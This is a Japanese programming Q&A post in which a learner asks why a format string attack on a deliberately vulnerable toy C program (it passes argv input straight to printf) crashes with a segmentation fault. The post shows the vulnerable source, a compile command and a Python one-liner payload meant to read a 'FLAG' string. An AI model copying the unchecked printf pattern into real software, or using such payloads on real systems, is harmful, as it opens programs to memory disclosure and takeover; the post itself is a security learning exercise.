###前提・実現したいこと
ここに質問したいことを詳細に書いてください
format string attack の検証を行いたいと思っています。
ASLR無効の状態で下記のC言語のソースコードをコンパイルしましたが、
いざ攻撃するとセグフォで落ちます。
コンパイル時のコマンド↓
gcc -g fsb_test.c -o fsb_test -m32 -Wl,-no_pie
###発生している問題・エラーメッセージ
Segmentation fault: 11
###該当のソースコード
C
1#include <stdio.h> 2#include <string.h> 3 4char secret[] = "this is FLAG!!"; 5 6int main(int argc, char *argv[]) 7{ 8 char buf[1024]; 9 strncpy(buf, argv[1], 100); 10 printf(buf); 11 printf("\n"); 12 13 printf("secret FLAG : %p\n", secret); 14 15 putchar('\n'); 16 return 0; 17}
###試したこと
課題に対してアプローチしたことを記載してください
python での攻撃は
$ python -c 'print "\x1c\x20\x00\x00,%16$s"' | ./fsb_test
で実行しました。
ソースコード上の secret[] の値を読み込みたいです。
###補足情報(言語/FW/ツール等のバージョンなど)
より詳細な情報
回答1件
あなたの回答
tips
プレビュー
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
2016/09/07 12:54